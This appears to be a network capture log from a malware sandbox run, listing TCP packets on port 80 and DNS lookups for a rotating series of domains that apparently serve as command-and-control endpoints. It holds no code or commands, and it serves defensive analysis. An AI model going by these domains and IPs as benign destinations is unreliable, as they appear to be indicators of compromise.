Nov 17, 2024 08:37:01.014873028 CET | 80 | 50022 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:01.830374002 CET | 80 | 50022 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:01.830446959 CET | 50022 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:02.514518976 CET | 50022 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:02.519462109 CET | 80 | 50022 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.532901049 CET | 50023 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:03.538099051 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.538182020 CET | 50023 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:03.548578978 CET | 50023 | 80 | 192.168.2.4 | 3.33.130.190
Nov 17, 2024 08:37:03.553616047 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.553673029 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.553716898 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.553746939 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.553776026 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.553831100 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
Nov 17, 2024 08:37:03.553869963 CET | 80 | 50023 | 3.33.130.190 | 192.168.2.4
                                                                                Nov 17, 2024 08:37:03.553896904 CET80500233.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:03.553929090 CET80500233.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:04.176525116 CET80500233.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:04.176598072 CET5002380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:05.061501980 CET5002380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:05.066421986 CET80500233.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:06.081218004 CET5002480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:06.086559057 CET80500243.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:06.086638927 CET5002480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:06.094369888 CET5002480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:06.099250078 CET80500243.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:06.717147112 CET80500243.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:06.717972040 CET80500243.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:06.722390890 CET5002480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:06.722390890 CET5002480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:06.727760077 CET80500243.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:11.962428093 CET5002580192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:11.967497110 CET805002598.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:11.967720032 CET5002580192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:11.980007887 CET5002580192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:11.985076904 CET805002598.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:12.617120028 CET805002598.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:12.618607044 CET805002598.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:12.618901968 CET5002580192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:12.635382891 CET805002598.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:12.635787964 CET5002580192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:13.483374119 CET5002580192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:14.502170086 CET5002680192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:14.507505894 CET805002698.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:14.507579088 CET5002680192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:14.518320084 CET5002680192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:14.523597956 CET805002698.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:15.152802944 CET805002698.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:15.152828932 CET805002698.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:15.155421019 CET5002680192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:15.172240019 CET805002698.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:15.177512884 CET5002680192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:16.030118942 CET5002680192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:17.049599886 CET5002780192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:17.054887056 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.057704926 CET5002780192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:17.066808939 CET5002780192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:17.071993113 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072010994 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072025061 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072056055 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072067976 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072145939 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072159052 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072186947 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.072199106 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.703530073 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.703572989 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.703737020 CET5002780192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:17.724364042 CET805002798.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:17.724620104 CET5002780192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:18.579032898 CET5002780192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:19.595616102 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:19.601046085 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:19.601150036 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:19.607604027 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:19.613245964 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:20.466541052 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:20.466597080 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:20.466635942 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:20.466670990 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:20.466700077 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:20.466779947 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:20.466779947 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:20.469444990 CET5002880192.168.2.498.124.224.17
                                                                                Nov 17, 2024 08:37:20.474560022 CET805002898.124.224.17192.168.2.4
                                                                                Nov 17, 2024 08:37:25.513528109 CET5002980192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:25.518518925 CET805002967.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:25.521596909 CET5002980192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:25.531018972 CET5002980192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:25.536303043 CET805002967.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:26.203180075 CET805002967.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:26.242094994 CET805002967.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:26.242161036 CET5002980192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:27.045896053 CET5002980192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:28.064573050 CET5003080192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:28.071046114 CET805003067.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:28.071186066 CET5003080192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:28.083425999 CET5003080192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:28.089840889 CET805003067.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:28.751096964 CET805003067.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:28.797666073 CET5003080192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:29.038094997 CET805003067.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:29.041687012 CET5003080192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:29.592731953 CET5003080192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:30.613516092 CET5003180192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:30.618869066 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.623894930 CET5003180192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:30.633543015 CET5003180192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:30.638958931 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639000893 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639029026 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639056921 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639084101 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639137983 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639166117 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639192104 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:30.639219046 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:31.302999973 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:31.342365980 CET805003167.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:31.349528074 CET5003180192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:32.139575958 CET5003180192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:33.158570051 CET5003280192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:33.164086103 CET805003267.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:33.165571928 CET5003280192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:33.173196077 CET5003280192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:33.178555965 CET805003267.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:33.829375982 CET805003267.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:33.867666960 CET805003267.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:33.867748022 CET5003280192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:33.868904114 CET5003280192.168.2.467.223.117.169
                                                                                Nov 17, 2024 08:37:33.873853922 CET805003267.223.117.169192.168.2.4
                                                                                Nov 17, 2024 08:37:38.917620897 CET5003380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:38.923129082 CET80500333.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:38.926947117 CET5003380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:38.937521935 CET5003380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:38.942917109 CET80500333.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:39.564346075 CET80500333.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:39.569654942 CET5003380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:40.436487913 CET5003380192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:40.441831112 CET80500333.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:41.455059052 CET5003480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:41.460621119 CET80500343.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:41.461615086 CET5003480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:41.473596096 CET5003480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:41.478818893 CET80500343.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:42.107489109 CET80500343.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:42.107536077 CET5003480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:42.985502005 CET5003480192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:42.992316008 CET80500343.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.002091885 CET5003580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:44.007827044 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.008038044 CET5003580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:44.018862963 CET5003580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:44.024914026 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.024965048 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025037050 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025096893 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025152922 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025181055 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025208950 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025235891 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.025263071 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.657675028 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:44.661725998 CET5003580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:45.533616066 CET5003580192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:45.538850069 CET80500353.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:46.548767090 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:47.403157949 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:47.403352976 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:47.409506083 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:47.414882898 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:48.045371056 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:48.046134949 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:48.046200037 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:48.048926115 CET5003680192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:48.054299116 CET80500363.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:53.124197006 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:53.129344940 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:53.129678965 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:53.140146971 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:53.145266056 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:54.657727957 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:54.820127010 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:54.820281982 CET5003780192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:54.820620060 CET80500373.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:55.673382044 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:55.688497066 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:55.688574076 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:55.699189901 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:55.704204082 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:56.327272892 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:56.327332020 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:57.202054977 CET5003880192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:57.207051039 CET80500383.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.220874071 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:58.419891119 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.420011044 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:58.434643984 CET5003980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:37:58.439575911 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439636946 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439682961 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439709902 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439728975 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439739943 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:37:58.439760923 CET80500393.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:08.082278967 CET80500583.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.408811092 CET5005980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:09.414356947 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.415695906 CET5005980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:09.424566031 CET5005980192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:39:09.430092096 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430135012 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430162907 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430190086 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430217981 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430244923 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430272102 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430299997 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:09.430327892 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:10.044704914 CET80500593.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:39:10.044832945 CET5005980192.168.2.43.33.130.190
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 08:35:53.798593044 CET | 62219 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:35:53.825243950 CET | 53 | 62219 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:36:09.847253084 CET | 63894 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:36:09.949516058 CET | 53 | 63894 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:36:23.454632044 CET | 63357 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:36:23.493035078 CET | 53 | 63357 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:36:36.876545906 CET | 52899 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:36:36.885418892 CET | 53 | 52899 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:36:44.941035032 CET | 55170 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:36:44.990912914 CET | 53 | 55170 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:36:58.423949957 CET | 64564 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:36:58.437314034 CET | 53 | 64564 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:37:11.737153053 CET | 65042 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:37:11.959589958 CET | 53 | 65042 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:37:25.486367941 CET | 53307 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:37:25.509663105 CET | 53 | 53307 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:37:38.877665043 CET | 62965 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:37:38.912429094 CET | 53 | 62965 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:37:53.064559937 CET | 56421 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:37:53.121922016 CET | 53 | 56421 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:38:06.596693039 CET | 64393 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:38:06.608757019 CET | 53 | 64393 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:38:19.924885035 CET | 55727 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:38:19.959871054 CET | 53 | 55727 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:38:34.135893106 CET | 59675 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:38:34.175879002 CET | 53 | 59675 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:38:47.705892086 CET | 52658 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:38:47.723491907 CET | 53 | 52658 | 1.1.1.1 | 192.168.2.4
Nov 17, 2024 08:39:03.955667973 CET | 62412 | 53 | 192.168.2.4 | 1.1.1.1
Nov 17, 2024 08:39:03.996607065 CET | 53 | 62412 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 17, 2024 08:35:53.798593044 CET | 192.168.2.4 | 1.1.1.1 | 0xc43d | Standard query (0) | www.arcare.partners | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:09.847253084 CET | 192.168.2.4 | 1.1.1.1 | 0x8a2f | Standard query (0) | www.bejho.net | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:23.454632044 CET | 192.168.2.4 | 1.1.1.1 | 0x9302 | Standard query (0) | www.jagdud.store | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:36.876545906 CET | 192.168.2.4 | 1.1.1.1 | 0x5e96 | Standard query (0) | www.dagoovis.org | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:44.941035032 CET | 192.168.2.4 | 1.1.1.1 | 0x1614 | Standard query (0) | www.nieuws-july202541.sbs | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:58.423949957 CET | 192.168.2.4 | 1.1.1.1 | 0xfcdd | Standard query (0) | www.bandukchi.com | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:11.737153053 CET | 192.168.2.4 | 1.1.1.1 | 0x77f9 | Standard query (0) | www.gcast.video | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:25.486367941 CET | 192.168.2.4 | 1.1.1.1 | 0x496e | Standard query (0) | www.rtpsilva4d.click | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:38.877665043 CET | 192.168.2.4 | 1.1.1.1 | 0xeade | Standard query (0) | www.bearableguy.net | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:53.064559937 CET | 192.168.2.4 | 1.1.1.1 | 0x5ff5 | Standard query (0) | www.funddata-x.net | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:06.596693039 CET | 192.168.2.4 | 1.1.1.1 | 0x808e | Standard query (0) | www.s9gzg9.vip | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:19.924885035 CET | 192.168.2.4 | 1.1.1.1 | 0xdd23 | Standard query (0) | www.oneid.ink | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:34.135893106 CET | 192.168.2.4 | 1.1.1.1 | 0xd88b | Standard query (0) | www.extrem.tech | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:47.705892086 CET | 192.168.2.4 | 1.1.1.1 | 0x8e9e | Standard query (0) | www.everyone.golf | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:39:03.955667973 CET | 192.168.2.4 | 1.1.1.1 | 0x1a9c | Standard query (0) | www.booosted.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 17, 2024 08:35:53.825243950 CET | 1.1.1.1 | 192.168.2.4 | 0xc43d | No error (0) | www.arcare.partners | arcare.partners | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:35:53.825243950 CET | 1.1.1.1 | 192.168.2.4 | 0xc43d | No error (0) | arcare.partners | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:35:53.825243950 CET | 1.1.1.1 | 192.168.2.4 | 0xc43d | No error (0) | arcare.partners | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:09.949516058 CET | 1.1.1.1 | 192.168.2.4 | 0x8a2f | No error (0) | www.bejho.net | | 64.225.91.73 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:23.493035078 CET | 1.1.1.1 | 192.168.2.4 | 0x9302 | No error (0) | www.jagdud.store | | 209.74.64.187 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:36.885418892 CET | 1.1.1.1 | 192.168.2.4 | 0x5e96 | Name error (3) | www.dagoovis.org | none | none | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:44.990912914 CET | 1.1.1.1 | 192.168.2.4 | 0x1614 | No error (0) | www.nieuws-july202541.sbs | nieuws-july202541.sbs | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:36:44.990912914 CET | 1.1.1.1 | 192.168.2.4 | 0x1614 | No error (0) | nieuws-july202541.sbs | | 162.0.215.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:58.437314034 CET | 1.1.1.1 | 192.168.2.4 | 0xfcdd | No error (0) | www.bandukchi.com | bandukchi.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:36:58.437314034 CET | 1.1.1.1 | 192.168.2.4 | 0xfcdd | No error (0) | bandukchi.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:36:58.437314034 CET | 1.1.1.1 | 192.168.2.4 | 0xfcdd | No error (0) | bandukchi.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:11.959589958 CET | 1.1.1.1 | 192.168.2.4 | 0x77f9 | No error (0) | www.gcast.video | | 98.124.224.17 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:25.509663105 CET | 1.1.1.1 | 192.168.2.4 | 0x496e | No error (0) | www.rtpsilva4d.click | rtpsilva4d.click | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:37:25.509663105 CET | 1.1.1.1 | 192.168.2.4 | 0x496e | No error (0) | rtpsilva4d.click | | 67.223.117.169 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:38.912429094 CET | 1.1.1.1 | 192.168.2.4 | 0xeade | No error (0) | www.bearableguy.net | bearableguy.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:37:38.912429094 CET | 1.1.1.1 | 192.168.2.4 | 0xeade | No error (0) | bearableguy.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:38.912429094 CET | 1.1.1.1 | 192.168.2.4 | 0xeade | No error (0) | bearableguy.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:53.121922016 CET | 1.1.1.1 | 192.168.2.4 | 0x5ff5 | No error (0) | www.funddata-x.net | funddata-x.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:37:53.121922016 CET | 1.1.1.1 | 192.168.2.4 | 0x5ff5 | No error (0) | funddata-x.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:37:53.121922016 CET | 1.1.1.1 | 192.168.2.4 | 0x5ff5 | No error (0) | funddata-x.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 17, 2024 08:38:06.608757019 CET | 1.1.1.1 | 192.168.2.4 | 0x808e | No error (0) | www.s9gzg9.vip | s9gzg9.vip | | CNAME (Canonical name) | IN (0x0001) | false
Nov 17, 2024 08:38:06.608757019 CET | 1.1.1.1 | 192.168.2.4 | 0x808e | No error (0) | s9gzg9.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
